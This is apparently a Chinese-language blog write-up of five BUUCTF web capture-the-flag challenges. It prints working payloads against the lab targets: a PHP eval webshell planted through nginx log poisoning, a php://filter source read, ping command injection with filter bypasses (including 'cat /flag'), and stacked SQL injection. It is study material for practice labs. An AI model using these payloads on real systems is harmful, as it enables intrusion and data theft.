BUUCTF-WEB(4-8)

[ACTF2020 新生赛]Include

打开题目,是一个超链接,点击后,发现URL发生了变化

可以看出是文件包含,包含了一个flag.php的文件

我们试着访问/etc/passwd

我又试了试伪协议,显然是被过滤了

然后我们就访问了一下nginx的日志,访问成功

?file=/var/log/nginx/access.log

那我们就是UA头写马吧

<?php @eval($_POST['cmd']);?>

然后我们就用那个nginx日志的那个URL,然后连接密码为cmd,去用蚁剑连接一下

连接成功后,在根目录找到flag,然后得出结论我是傻逼

后来我又看了一下文件

原来伪协议,还可以用,我们应该用伪协议去看那个flag.php的源码

就用php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

就得到源码被base64加密后的数据,我们解密一下

终于拿到flag了,我真要哭了

[ACTF2020 新生赛]Exec

这道题熟悉的ping,我们就复习一下命令连接符就行了

Windows和Linux都支持的命令连接符:

cmd1 | cmd2 只执行cmd2

cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行

cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2

cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2

Linux还支持分号(;),cmd1;cmd2 按顺序依次执行,先执行cmd1再执行cmd2

那我们就无需多言,直接战斗

127.0.0.1 | whoami

直接拿下flag

127.0.0.1 | cat /flag

[GXYCTF2019]Ping Ping Ping

参考

命令执行漏洞各种绕过方式_命令执行漏洞 变种 绕过-CSDN博客

命令执行RCE及其绕过详细总结(各情景下的绕过)_rce反弹shell绕过-CSDN博客

这道题还是PING,只不过是GET方式传参

我直接满心欢喜准备拿下

?ip=127.0.0.1 | ls

他显然过滤了空格,气的暴骂我

那我们就绕过空格,我就不用空格了

?ip=127.0.0.1|ls

直接索要flag,这里我发现了哈,有一些符号他也过滤了,比如小数点,单引号,双引号,括号,大括号啥的

但是能用的就是

$ - ~ \ `

他直接大骂fxxk

因为反引号可以用,而且ls已经看到了flag.php

payload

?ip=127.0.0.1|cat$IFS`ls`

然后只能回显index.php的内容,不要怀疑自己,直接看源码

[SUCTF 2019]EasySQL

参考

[BUUCTF:SUCTF 2019]EasySQL-CSDN博客

[buuctf-SUCTF 2019]EasySQL 1(小宇特详解)-CSDN博客

这个题目就是我挺云里雾里的(我太菜了),挺多字符都被过滤之后,看到分号,然后就是尝试堆叠注入

查库名

1; show databases;

查表名

1;use ctf;show tables;

查列名

1;show columns from Flag;

然后发现查不到

然后大佬们说语句就长这样(我还是不太理解),可以看一下大佬们的分析

$sql = "select ".$post['query']."||flag from Flag";

然后payload就是

*,1

[强网杯 2019]随便注

参考:

[强网杯 2019]随便注 - chalan630 - 博客园 (cnblogs.com)

我们先判断这个数字还是字符

?inject=1' and '1'='1 正常回显
?inject=1' and '1'='2 错误回显

判断出是字符注入,然后是单引号闭合

?inject=1' order by 2--+
?inject=1' order by 3--+

判断出是两个字段

然后继续的时候,发现过滤了一些函数

这边我试了一下,注释符绕不过去的,所以这里我想到了堆叠注入,就是上一题学的

查库名:

?inject=1';show database;#

查表名

?inject=1';show tables;#

查列名

?inject=1';show columns from words;#

?inject=1%27;show%20columns%20from%20`1919810931114514`;#
注意数据表为数字的时候需要用反引号括起来

flag在这个数字这个表

这道题到这里,我就完全不会了,一点儿都不知道怎么给flag这个查询出来

最后的flag的payload为:

-1';
sEt @sql=CONCAT('se','lect * from `1919810931114514`;');
prEpare stmt from @sql;
execute stmt;

热门相关:电锯惊魂   妈妈的情人   妈妈的爱人   美少女战队   高中舰队剧场版